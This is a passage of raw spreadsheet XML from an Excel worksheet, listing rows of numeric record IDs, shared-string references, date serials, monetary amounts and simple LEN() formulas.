      </c>
      <c r="G1596" s="1">
        <v>43965</v>
      </c>
      <c r="H1596">
        <v>0</v>
      </c>
      <c r="K1596">
        <f>LEN(I1596)</f>
        <v>0</v>
      </c>
      <c r="L1596">
        <f>LEN(J1596)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1597" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1597">
        <v>16652</v>
      </c>
      <c r="B1597">
        <v>2118</v>
      </c>
      <c r="C1597" t="s">
        <v>6761</v>
      </c>
      <c r="D1597" t="s">
        <v>9449</v>
      </c>
      <c r="E1597">
        <v>1</v>
      </c>
      <c r="F1597" t="s">
        <v>9450</v>
      </c>
      <c r="G1597" s="1">
        <v>43851</v>
      </c>
      <c r="H1597">
        <v>5000</v>
      </c>
      <c r="K1597">
        <f>LEN(I1597)</f>
        <v>0</v>
      </c>
      <c r="L1597">
        <f>LEN(J1597)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1598" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1598">
        <v>16653</v>
      </c>
      <c r="B1598">
        <v>2118</v>
      </c>
      <c r="C1598" t="s">
        <v>6761</v>
      </c>
      <c r="D1598" t="s">
        <v>9449</v>
      </c>
      <c r="E1598">
        <v>1</v>
      </c>
      <c r="F1598" t="s">
        <v>6917</v>
      </c>
      <c r="G1598" s="1">
        <v>43851</v>
      </c>
      <c r="H1598">
        <v>5000</v>
      </c>
      <c r="K1598">
        <f>LEN(I1598)</f>
        <v>0</v>
      </c>
      <c r="L1598">
        <f>LEN(J1598)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1599" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1599">
        <v>16655</v>
      </c>
      <c r="B1599">
        <v>2118</v>
      </c>
      <c r="C1599" t="s">
        <v>6761</v>
      </c>
      <c r="D1599" t="s">
        <v>9449</v>
      </c>
      <c r="E1599">
        <v>1</v>
      </c>
      <c r="F1599" t="s">
        <v>9451</v>
      </c>
      <c r="G1599" s="1">
        <v>43851</v>
      </c>
      <c r="H1599">
        <v>5000</v>
      </c>
      <c r="K1599">
        <f>LEN(I1599)</f>
        <v>0</v>
      </c>
      <c r="L1599">
        <f>LEN(J1599)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1600" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1600">
        <v>16656</v>
      </c>
      <c r="B1600">
        <v>2118</v>
      </c>
      <c r="C1600" t="s">
        <v>6761</v>
      </c>
      <c r="D1600" t="s">
        <v>9449</v>
      </c>
      <c r="E1600">
        <v>1</v>
      </c>
      <c r="F1600" t="s">
        <v>4686</v>
      </c>
      <c r="G1600" s="1">
        <v>43851</v>
      </c>
      <c r="H1600">
        <v>5000</v>
      </c>
      <c r="K1600">
        <f>LEN(I1600)</f>
        <v>0</v>
      </c>
      <c r="L1600">
        <f>LEN(J1600)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1601" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1601">
        <v>16657</v>
      </c>
      <c r="B1601">
        <v>1222</v>
      </c>
      <c r="C1601" t="s">
        <v>3225</v>
      </c>
      <c r="D1601" t="s">
        <v>9452</v>
      </c>
      <c r="E1601">
        <v>11</v>
      </c>
      <c r="F1601" t="s">
        <v>764</v>
      </c>
      <c r="G1601" s="1">
        <v>44022</v>
      </c>
      <c r="H1601">
        <v>95000</v>
      </c>
      <c r="K1601">
        <f>LEN(I1601)</f>
        <v>0</v>
      </c>
      <c r="L1601">
        <f>LEN(J1601)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1602" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1602">
        <v>16658</v>
      </c>
      <c r="B1602">
        <v>1222</v>
      </c>
      <c r="C1602" t="s">
        <v>3225</v>
      </c>
      <c r="D1602" t="s">
        <v>9452</v>
      </c>
      <c r="E1602">
        <v>11</v>
      </c>
      <c r="F1602" t="s">
        <v>9453</v>
      </c>
      <c r="G1602" s="1">
        <v>44022</v>
      </c>
      <c r="H1602">
        <v>95000</v>
      </c>
      <c r="K1602">
        <f>LEN(I1602)</f>
        <v>0</v>
      </c>
      <c r="L1602">
        <f>LEN(J1602)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1603" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1603">
        <v>16659</v>
      </c>
      <c r="B1603">
        <v>1222</v>
      </c>
      <c r="C1603" t="s">
        <v>3225</v>
      </c>
      <c r="D1603" t="s">
        <v>9452</v>
      </c>
      <c r="E1603">
        <v>11</v>
      </c>
      <c r="F1603" t="s">
        <v>547</v>
      </c>
      <c r="G1603" s="1">
        <v>44022</v>
      </c>
      <c r="H1603">
        <v>95000</v>
      </c>
      <c r="K1603">
        <f>LEN(I1603)</f>
        <v>0</v>
      </c>
      <c r="L1603">
        <f>LEN(J1603)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1604" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1604">
        <v>16660</v>
      </c>
      <c r="B1604">
        <v>1222</v>
      </c>
      <c r="C1604" t="s">
        <v>3225</v>
      </c>
      <c r="D1604" t="s">
        <v>9452</v>
      </c>
      <c r="E1604">
        <v>11</v>
      </c>
      <c r="F1604" t="s">
        <v>9454</v>
      </c>
      <c r="G1604" s="1">
        <v>44022</v>
      </c>
      <c r="H1604">
        <v>95000</v>
      </c>
      <c r="K1604">
        <f>LEN(I1604)</f>
        <v>0</v>
      </c>
      <c r="L1604">
        <f>LEN(J1604)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1605" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1605">
        <v>16661</v>
      </c>
      <c r="B1605">
        <v>1222</v>
      </c>
      <c r="C1605" t="s">
        <v>3225</v>
      </c>
      <c r="D1605" t="s">
        <v>9452</v>
      </c>
      <c r="E1605">
        <v>11</v>
      </c>
      <c r="F1605" t="s">
        <v>512</v>
      </c>
      <c r="G1605" s="1">
        <v>44022</v>
      </c>
      <c r="H1605">
        <v>95000</v>
      </c>
      <c r="K1605">
        <f>LEN(I1605)</f>
        <v>0</v>
      </c>
      <c r="L1605">
        <f>LEN(J1605)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1606" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1606">
        <v>16662</v>
      </c>
      <c r="B1606">
        <v>1222</v>
      </c>
      <c r="C1606" t="s">
        <v>3225</v>
      </c>
      <c r="D1606" t="s">
        <v>9452</v>
      </c>
      <c r="E1606">
        <v>11</v>
      </c>
      <c r="F1606" t="s">
        <v>5434</v>
      </c>
      <c r="G1606" s="1">
        <v>44022</v>
      </c>
      <c r="H1606">
        <v>95000</v>
      </c>
      <c r="K1606">
        <f>LEN(I1606)</f>
        <v>0</v>
      </c>
      <c r="L1606">
        <f>LEN(J1606)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1607" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1607">
        <v>16663</v>
      </c>
      <c r="B1607">
        <v>1222</v>
      </c>
      <c r="C1607" t="s">
        <v>3225</v>
      </c>
      <c r="D1607" t="s">
        <v>9452</v>
      </c>
      <c r="E1607">
        <v>11</v>
      </c>
      <c r="F1607" t="s">
        <v>9217</v>
      </c>
      <c r="G1607" s="1">
        <v>44022</v>
      </c>
      <c r="H1607">
        <v>95000</v>
      </c>
      <c r="K1607">
        <f>LEN(I1607)</f>
        <v>0</v>
      </c>
      <c r="L1607">
        <f>LEN(J1607)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1608" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1608">
        <v>16665</v>
      </c>
      <c r="B1608">
        <v>1222</v>
      </c>
      <c r="C1608" t="s">
        <v>3225</v>
      </c>
      <c r="D1608" t="s">
        <v>9452</v>
      </c>
      <c r="E1608">
        <v>11</v>
      </c>
      <c r="F1608" t="s">
        <v>9457</v>
      </c>
      <c r="G1608" s="1">
        <v>44022</v>
      </c>
      <c r="H1608">
        <v>95000</v>
      </c>
      <c r="K1608">
        <f>LEN(I1608)</f>
        <v>0</v>
      </c>
      <c r="L1608">
        <f>LEN(J1608)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1609" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1609">
        <v>16666</v>
      </c>
      <c r="B1609">
        <v>1222</v>
      </c>
      <c r="C1609" t="s">
        <v>3225</v>
      </c>
      <c r="D1609" t="s">
        <v>9452</v>
      </c>
      <c r="E1609">
        <v>11</v>
      </c>
      <c r="F1609" t="s">
        <v>7057</v>
      </c>
      <c r="G1609" s="1">
        <v>44022</v>
      </c>
      <c r="H1609">
        <v>95000</v>
      </c>
      <c r="K1609">
        <f>LEN(I1609)</f>
        <v>0</v>
      </c>
      <c r="L1609">
        <f>LEN(J1609)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1610" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1610">
        <v>16669</v>
      </c>
      <c r="B1610">
        <v>1222</v>
      </c>
      <c r="C1610" t="s">
        <v>3225</v>
      </c>
      <c r="D1610" t="s">
        <v>9452</v>
      </c>
      <c r="E1610">
        <v>11</v>
      </c>
      <c r="F1610" t="s">
        <v>1746</v>
      </c>
      <c r="G1610" s="1">
        <v>44022</v>
      </c>
      <c r="H1610">
        <v>55000</v>
      </c>
      <c r="K1610">
        <f>LEN(I1610)</f>
        <v>0</v>
      </c>
      <c r="L1610">
        <f>LEN(J1610)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1611" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1611">
        <v>16670</v>
      </c>
      <c r="B1611">
        <v>1222</v>
      </c>
      <c r="C1611" t="s">
        <v>3225</v>
      </c>
      <c r="D1611" t="s">
        <v>9452</v>
      </c>
      <c r="E1611">
        <v>11</v>
      </c>
      <c r="F1611" t="s">
        <v>9460</v>
      </c>
      <c r="G1611" s="1">
        <v>44022</v>
      </c>
      <c r="H1611">
        <v>55000</v>
      </c>
      <c r="K1611">
        <f>LEN(I1611)</f>
        <v>0</v>
      </c>
      <c r="L1611">
        <f>LEN(J1611)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1612" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1612">
        <v>16672</v>
      </c>
      <c r="B1612">
        <v>1222</v>
      </c>
      <c r="C1612" t="s">
        <v>3225</v>
      </c>
      <c r="D1612" t="s">
        <v>9452</v>
      </c>
      <c r="E1612">
        <v>11</v>
      </c>
      <c r="F1612" t="s">
        <v>2236</v>
      </c>
      <c r="G1612" s="1">
        <v>44022</v>
      </c>
      <c r="H1612">
        <v>95000</v>
      </c>
      <c r="K1612">
        <f>LEN(I1612)</f>
        <v>0</v>
      </c>
      <c r="L1612">
        <f>LEN(J1612)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1613" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1613">
        <v>16675</v>
      </c>
      <c r="B1613">
        <v>2207</v>
      </c>
      <c r="C1613" t="s">
        <v>6773</v>
      </c>
      <c r="D1613" t="s">
        <v>9463</v>
      </c>
      <c r="E1613">
        <v>29</v>
      </c>
      <c r="F1613" t="s">
        <v>9464</v>
      </c>
      <c r="G1613" s="1">
        <v>43860</v>
      </c>
      <c r="H1613">
        <v>5000</v>
      </c>
      <c r="K1613">
        <f>LEN(I1613)</f>
        <v>0</v>
      </c>
      <c r="L1613">
        <f>LEN(J1613)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1614" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1614">
        <v>16676</v>
      </c>
      <c r="B1614">
        <v>2207</v>
      </c>
      <c r="C1614" t="s">
        <v>6773</v>
      </c>
      <c r="D1614" t="s">
        <v>9463</v>
      </c>
      <c r="E1614">
        <v>29</v>
      </c>
      <c r="F1614" t="s">
        <v>1455</v>
      </c>
      <c r="G1614" s="1">
        <v>43860</v>
      </c>
      <c r="H1614">
        <v>400000</v>
      </c>
      <c r="K1614">
        <f>LEN(I1614)</f>
        <v>0</v>
      </c>
      <c r="L1614">
        <f>LEN(J1614)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1615" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1615">
        <v>16677</v>
      </c>
      <c r="B1615">
        <v>2207</v>
      </c>
      <c r="C1615" t="s">
        <v>6773</v>
      </c>
      <c r="D1615" t="s">
        <v>9463</v>
      </c>
      <c r="E1615">
        <v>29</v>
      </c>
      <c r="F1615" t="s">
        <v>1207</v>
      </c>
      <c r="G1615" s="1">
        <v>43860</v>
      </c>
      <c r="H1615">
        <v>80000</v>
      </c>
      <c r="K1615">
        <f>LEN(I1615)</f>
        <v>0</v>
      </c>
      <c r="L1615">
        <f>LEN(J1615)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1616" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1616">
        <v>16682</v>
      </c>
      <c r="B1616">
        <v>563</v>
      </c>
      <c r="C1616" t="s">
        <v>1821</v>
      </c>
      <c r="D1616" t="s">
        <v>9465</v>
      </c>
      <c r="E1616">
        <v>24</v>
      </c>
      <c r="F1616" t="s">
        <v>9466</v>
      </c>
      <c r="G1616" s="1">
        <v>43837</v>
      </c>
      <c r="H1616">
        <v>10000</v>
      </c>
      <c r="K1616">
        <f>LEN(I1616)</f>
        <v>0</v>
      </c>
      <c r="L1616">
        <f>LEN(J1616)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1617" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1617">
        <v>16685</v>
      </c>
      <c r="B1617">
        <v>1238</v>
      </c>
      <c r="C1617" t="s">
        <v>344</v>
      </c>
      <c r="D1617" t="s">
        <v>9467</v>
      </c>
      <c r="E1617">
        <v>16</v>
      </c>
      <c r="F1617" t="s">
        <v>7241</v>
      </c>
      <c r="G1617" s="1">
        <v>43941</v>
      </c>
      <c r="H1617">
        <v>1080000</v>
      </c>
      <c r="K1617">
        <f>LEN(I1617)</f>
        <v>0</v>
      </c>
      <c r="L1617">
        <f>LEN(J1617)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1618" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1618">
        <v>16687</v>
      </c>
      <c r="B1618">
        <v>2178</v>
      </c>
      <c r="C1618" t="s">
        <v>5039</v>
      </c>
      <c r="D1618" t="s">
        <v>9468</v>
      </c>
      <c r="E1618">
        <v>16</v>
      </c>
      <c r="F1618" t="s">
        <v>9469</v>
      </c>
      <c r="G1618" s="1">
        <v>43847</v>
      </c>
      <c r="H1618">
        <v>200000</v>
      </c>
      <c r="K1618">
        <f>LEN(I1618)</f>
        <v>0</v>
      </c>
      <c r="L1618">
        <f>LEN(J1618)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1619" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1619">
        <v>16688</v>
      </c>
      <c r="B1619">
        <v>2178</v>
      </c>
      <c r="C1619" t="s">
        <v>5039</v>
      </c>
      <c r="D1619" t="s">
        <v>9468</v>
      </c>
      <c r="E1619">
        <v>16</v>
      </c>
      <c r="F1619" t="s">
        <v>9470</v>
      </c>
      <c r="G1619" s="1">
        <v>43847</v>
      </c>
      <c r="H1619">
        <v>5000</v>
      </c>
      <c r="K1619">
        <f>LEN(I1619)</f>
        <v>0</v>
      </c>
      <c r="L1619">
        <f>LEN(J1619)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1620" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1620">
        <v>16689</v>
      </c>
      <c r="B1620">
        <v>2178</v>
      </c>
      <c r="C1620" t="s">
        <v>5039</v>
      </c>
      <c r="D1620" t="s">
        <v>9468</v>
      </c>
      <c r="E1620">
        <v>16</v>
      </c>
      <c r="F1620" t="s">
        <v>1746</v>
      </c>
      <c r="G1620" s="1">
        <v>43847</v>
      </c>
      <c r="H1620">
        <v>5000</v>
      </c>
      <c r="K1620">
        <f>LEN(I1620)</f>
        <v>0</v>
      </c>
      <c r="L1620">
        <f>LEN(J1620)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1621" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1621">
        <v>16690</v>
      </c>
      <c r="B1621">
        <v>2178</v>
      </c>
      <c r="C1621" t="s">
        <v>5039</v>
      </c>
      <c r="D1621" t="s">
        <v>9468</v>
      </c>
      <c r="E1621">
        <v>16</v>
      </c>
      <c r="F1621" t="s">
        <v>9471</v>
      </c>
      <c r="G1621" s="1">
        <v>43847</v>
      </c>
      <c r="H1621">
        <v>10000</v>
      </c>
      <c r="K1621">
        <f>LEN(I1621)</f>
        <v>0</v>
      </c>
      <c r="L1621">
        <f>LEN(J1621)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1622" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1622">
        <v>16691</v>
      </c>
      <c r="B1622">
        <v>2178</v>
      </c>
      <c r="C1622" t="s">
        <v>5039</v>
      </c>
      <c r="D1622" t="s">
        <v>9468</v>
      </c>
      <c r="E1622">
        <v>16</v>
      </c>
      <c r="F1622" t="s">
        <v>9472</v>
      </c>
      <c r="G1622" s="1">
        <v>43847</v>
      </c>
      <c r="H1622">
        <v>10000</v>
      </c>
      <c r="K1622">
        <f>LEN(I1622)</f>
        <v>0</v>
      </c>
      <c r="L1622">
        <f>LEN(J1622)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1623" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1623">
        <v>16692</v>
      </c>
      <c r="B1623">
        <v>2178</v>
      </c>
      <c r="C1623" t="s">
        <v>5039</v>
      </c>
      <c r="D1623" t="s">
        <v>9468</v>
      </c>
      <c r="E1623">
        <v>16</v>
      </c>
      <c r="F1623" t="s">
        <v>9435</v>
      </c>
      <c r="G1623" s="1">
        <v>43847</v>
      </c>
      <c r="H1623">
        <v>100000</v>
      </c>
      <c r="K1623">
        <f>LEN(I1623)</f>
        <v>0</v>
      </c>
      <c r="L1623">
        <f>LEN(J1623)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1624" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1624">
        <v>16694</v>
      </c>
      <c r="B1624">
        <v>1733</v>
      </c>
      <c r="C1624" t="s">
        <v>6649</v>
      </c>
      <c r="D1624" t="s">
        <v>9473</v>
      </c>
      <c r="E1624">
        <v>14</v>
      </c>
      <c r="F1624" t="s">
        <v>9437</v>
      </c>
      <c r="G1624" s="1">
        <v>43896</v>
      </c>
      <c r="H1624">
        <v>1000</v>
      </c>
      <c r="K1624">
        <f>LEN(I1624)</f>
        <v>0</v>
      </c>
      <c r="L1624">
        <f>LEN(J1624)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1625" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1625">
        <v>16698</v>
      </c>
      <c r="B1625">
        <v>1733</v>
      </c>
      <c r="C1625" t="s">
        <v>6649</v>
      </c>
      <c r="D1625" t="s">
        <v>9473</v>
      </c>
      <c r="E1625">
        <v>14</v>
      </c>
      <c r="F1625" t="s">
        <v>9435</v>
      </c>
      <c r="G1625" s="1">
        <v>43896</v>
      </c>
      <c r="H1625">
        <v>1000</v>
      </c>
      <c r="K1625">
        <f>LEN(I1625)</f>
        <v>0</v>
      </c>
      <c r="L1625">
        <f>LEN(J1625)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1626" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1626">
        <v>16701</v>
      </c>
      <c r="B1626">
        <v>1912</v>
      </c>
      <c r="C1626" t="s">
        <v>6007</v>
      </c>
      <c r="D1626" t="s">
        <v>9482</v>
      </c>
      <c r="E1626">
        <v>11</v>
      </c>
      <c r="F1626" t="s">
        <v>5434</v>
      </c>
      <c r="G1626" s="1">
        <v>43923</v>
      </c>
      <c r="H1626">
        <v>50000</v>
      </c>
      <c r="K1626">
        <f>LEN(I1626)</f>
        <v>0</v>
      </c>
      <c r="L1626">
        <f>LEN(J1626)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1627" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1627">
        <v>16702</v>
      </c>
      <c r="B1627">
        <v>1912</v>
      </c>
      <c r="C1627" t="s">
        <v>6007</v>
      </c>
      <c r="D1627" t="s">
        <v>9482</v>
      </c>
      <c r="E1627">
        <v>11</v>
      </c>
      <c r="F1627" t="s">
        <v>9466</v>
      </c>
      <c r="G1627" s="1">
        <v>43923</v>
      </c>
      <c r="H1627">
        <v>10000</v>
      </c>
      <c r="K1627">
        <f>LEN(I1627)</f>
        <v>0</v>
      </c>
      <c r="L1627">
        <f>LEN(J1627)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1628" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1628">
        <v>16703</v>
      </c>
      <c r="B1628">
        <v>1912</v>
      </c>
      <c r="C1628" t="s">
        <v>6007</v>
      </c>
      <c r="D1628" t="s">
        <v>9482</v>
      </c>
      <c r="E1628">
        <v>11</v>
      </c>
      <c r="F1628" t="s">
        <v>9483</v>
      </c>
      <c r="G1628" s="1">
        <v>43923</v>
      </c>
      <c r="H1628">
        <v>10000</v>
      </c>
      <c r="K1628">
        <f>LEN(I1628)</f>
        <v>0</v>
      </c>
      <c r="L1628">
        <f>LEN(J1628)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1629" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1629">
        <v>16704</v>
      </c>
      <c r="B1629">
        <v>1912</v>
      </c>
      <c r="C1629" t="s">
        <v>6007</v>
      </c>
      <c r="D1629" t="s">
        <v>9482</v>
      </c>
      <c r="E1629">
        <v>11</v>
      </c>
      <c r="F1629" t="s">
        <v>9217</v>
      </c>
      <c r="G1629" s="1">
        <v>43923</v>
      </c>
      <c r="H1629">
        <v>40000</v>
      </c>
      <c r="K1629">
        <f>LEN(I1629)</f>
        <v>0</v>
      </c>
      <c r="L1629">
        <f>LEN(J1629)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1630" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1630">
        <v>16705</v>
      </c>
      <c r="B1630">
        <v>1912</v>
      </c>
      <c r="C1630" t="s">
        <v>6007</v>
      </c>
      <c r="D1630" t="s">
        <v>9482</v>
      </c>
      <c r="E1630">
        <v>11</v>
      </c>
      <c r="F1630" t="s">
        <v>512</v>
      </c>
      <c r="G1630" s="1">
        <v>43923</v>
      </c>
      <c r="H1630">
        <v>50000</v>
      </c>
      <c r="K1630">
        <f>LEN(I1630)</f>
        <v>0</v>
      </c>
      <c r="L1630">
        <f>LEN(J1630)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1631" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1631">
        <v>16706</v>
      </c>
      <c r="B1631">
        <v>1912</v>
      </c>
      <c r="C1631" t="s">
        <v>6007</v>
      </c>
      <c r="D1631" t="s">
        <v>9482</v>
      </c>
      <c r="E1631">
        <v>11</v>
      </c>
      <c r="F1631" t="s">
        <v>9454</v>
      </c>
      <c r="G1631" s="1">
        <v>43923</v>
      </c>
      <c r="H1631">
        <v>50000</v>
      </c>
      <c r="K1631">
        <f>LEN(I1631)</f>
        <v>0</v>
      </c>
      <c r="L1631">
        <f>LEN(J1631)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1632" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1632">
        <v>16709</v>
      </c>
      <c r="B1632">
        <v>1733</v>
      </c>
      <c r="C1632" t="s">
        <v>6649</v>
      </c>
      <c r="D1632" t="s">
        <v>9473</v>
      </c>
      <c r="E1632">
        <v>14</v>
      </c>
      <c r="F1632" t="s">
        <v>9487</v>
      </c>
      <c r="G1632" s="1">
        <v>43896</v>
      </c>
      <c r="H1632">
        <v>0</v>
      </c>
      <c r="K1632">
        <f>LEN(I1632)</f>
        <v>0</v>
      </c>
      <c r="L1632">
        <f>LEN(J1632)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1633" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1633">
        <v>16711</v>
      </c>
      <c r="B1633">
        <v>927</v>
      </c>
      <c r="C1633" t="s">
        <v>2649</v>
      </c>
      <c r="D1633" t="s">
        <v>9490</v>
      </c>
      <c r="E1633">
        <v>14</v>
      </c>
      <c r="F1633" t="s">
        <v>9491</v>
      </c>
      <c r="G1633" s="1">
        <v>43847</v>
      </c>
      <c r="H1633">
        <v>300000</v>
      </c>
      <c r="K1633">
        <f>LEN(I1633)</f>
        <v>0</v>
      </c>
      <c r="L1633">
        <f>LEN(J1633)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1634" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1634">
        <v>16717</v>
      </c>
      <c r="B1634">
        <v>2016</v>
      </c>
      <c r="C1634" t="s">
        <v>5283</v>
      </c>
      <c r="D1634" t="s">
        <v>9488</v>
      </c>
      <c r="E1634">
        <v>14</v>
      </c>
      <c r="F1634" t="s">
        <v>3499</v>
      </c>
      <c r="G1634" s="1">
        <v>43864</v>
      </c>
      <c r="H1634">
        <v>300000</v>
      </c>
      <c r="K1634">
        <f>LEN(I1634)</f>
        <v>0</v>
      </c>
      <c r="L1634">
        <f>LEN(J1634)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1635" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1635">
        <v>16718</v>
      </c>
      <c r="B1635">
        <v>2016</v>
      </c>
      <c r="C1635" t="s">
        <v>5283</v>
      </c>
      <c r="D1635" t="s">
        <v>9488</v>
      </c>
      <c r="E1635">
        <v>14</v>
      </c>
      <c r="F1635" t="s">
        <v>9497</v>
      </c>
      <c r="G1635" s="1">
        <v>43864</v>
      </c>
      <c r="H1635">
        <v>300000</v>
      </c>
      <c r="K1635">
        <f>LEN(I1635)</f>
        <v>0</v>
      </c>
      <c r="L1635">
        <f>LEN(J1635)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1636" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1636">
        <v>16719</v>
      </c>
      <c r="B1636">
        <v>2016</v>
      </c>
      <c r="C1636" t="s">
        <v>5283</v>
      </c>
      <c r="D1636" t="s">
        <v>9488</v>
      </c>
      <c r="E1636">
        <v>14</v>
      </c>
      <c r="F1636" t="s">
        <v>9498</v>
      </c>
      <c r="G1636" s="1">
        <v>43864</v>
      </c>
      <c r="H1636">
        <v>300000</v>
      </c>
      <c r="K1636">
        <f>LEN(I1636)</f>
        <v>0</v>
      </c>
      <c r="L1636">
        <f>LEN(J1636)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1637" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1637">
        <v>16721</v>
      </c>
      <c r="B1637">
        <v>2016</v>
      </c>
      <c r="C1637" t="s">
        <v>5283</v>
      </c>
      <c r="D1637" t="s">
        <v>5369</v>
      </c>
      <c r="K1637">
        <f>LEN(I1637)</f>
        <v>0</v>
      </c>
      <c r="L1637">
        <f>LEN(J1637)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1638" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1638" t="s">
        <v>9499</v>
      </c>
      <c r="B1638">
        <v>14</v>
      </c>
      <c r="C1638" t="s">
        <v>9500</v>
      </c>
      <c r="D1638" s="1">
        <v>43864</v>
      </c>
      <c r="E1638">
        <v>100000</v>
      </c>
      <c r="G1638" t="s">
        <v>9501</v>
      </c>
      <c r="K1638">
        <f>LEN(I1638)</f>
        <v>0</v>
      </c>
      <c r="L1638">
        <f>LEN(J1638)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1639" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1639">
        <v>16729</v>
      </c>
      <c r="B1639">
        <v>1308</v>
      </c>
      <c r="C1639" t="s">
        <v>3022</v>
      </c>
      <c r="D1639" t="s">
        <v>9503</v>
      </c>
      <c r="E1639">
        <v>11</v>
      </c>
      <c r="F1639" t="s">
        <v>9504</v>
      </c>
      <c r="G1639" s="1">
        <v>43936</v>
      </c>
      <c r="H1639">
        <v>0</v>
      </c>
      <c r="K1639">
        <f>LEN(I1639)</f>
        <v>0</v>
      </c>
      <c r="L1639">
        <f>LEN(J1639)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1640" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1640">
        <v>16730</v>
      </c>
      <c r="B1640">
        <v>1308</v>
      </c>
      <c r="C1640" t="s">
        <v>3022</v>
      </c>
      <c r="D1640" t="s">
        <v>9503</v>
      </c>
      <c r="E1640">
        <v>11</v>
      </c>
      <c r="F1640" t="s">
        <v>9505</v>
      </c>
      <c r="G1640" s="1">
        <v>43936</v>
      </c>
      <c r="H1640">
        <v>0</v>
      </c>
      <c r="K1640">
        <f>LEN(I1640)</f>
        <v>0</v>
      </c>
      <c r="L1640">
        <f>LEN(J1640)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1641" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1641">
        <v>16731</v>
      </c>
      <c r="B1641">
        <v>1308</v>
      </c>
      <c r="C1641" t="s">
        <v>3022</v>
      </c>
      <c r="D1641" t="s">
        <v>9503</v>
      </c>
      <c r="E1641">
        <v>11</v>
      </c>
      <c r="F1641" t="s">
        <v>7296</v>
      </c>
      <c r="G1641" s="1">
        <v>43936</v>
      </c>
      <c r="H1641">
        <v>0</v>
      </c>
      <c r="K1641">
        <f>LEN(I1641)</f>
        <v>0</v>
      </c>
      <c r="L1641">
        <f>LEN(J1641)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1642" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1642">
        <v>16850</v>
      </c>
      <c r="B1642">
        <v>88</v>
      </c>
      <c r="C1642" t="s">
        <v>73</v>
      </c>
      <c r="D1642" t="s">
